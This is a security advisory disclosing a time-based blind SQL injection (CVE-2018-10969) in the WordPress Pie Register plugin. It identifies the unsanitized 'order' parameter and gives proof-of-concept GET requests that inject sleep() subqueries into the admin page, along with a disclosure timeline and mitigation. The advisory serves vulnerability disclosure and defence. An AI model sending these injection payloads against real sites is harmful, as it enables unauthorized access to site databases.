# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection # Author: Manuel García Cárdenas # Date: 2018-05-10 # Software: WordPress Plugin Pie Register 3.0.9 # CVE: CVE-2018-10969 # I. VULNERABILITY # WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection # II. BACKGROUND # Pie-Register is a quick and easy way to brand your Registration Pages on # WordPress sites. # III. DESCRIPTION # This bug was found using the portal in the files: # /pie-register/classes/invitation_code_pagination.php: if ( isset( # $_GET['order'] ) && $_GET['order'] ) # /pie-register/classes/invitation_code_pagination.php: $order = # $_GET['order']; # And when the query is executed, the parameter "order" it is not sanitized. # /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order ); # IV. PROOF OF CONCEPT # The following URL have been confirmed to all suffer from Time Based SQL Injection. GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1(2 seconds of response) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1(30 seconds of response) # V. SYSTEMS AFFECTED # Pie Register <= 3.0.9 # VI. DISCLOSURE TIMELINE # May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas # May 10, 2018 2: Send to vendor without response # June 05, 2018 3: Second email to vendor without response # June 11, 2018 4: Send to the Full-Disclosure lists # VII. Solution # Disable plugin until a fix is available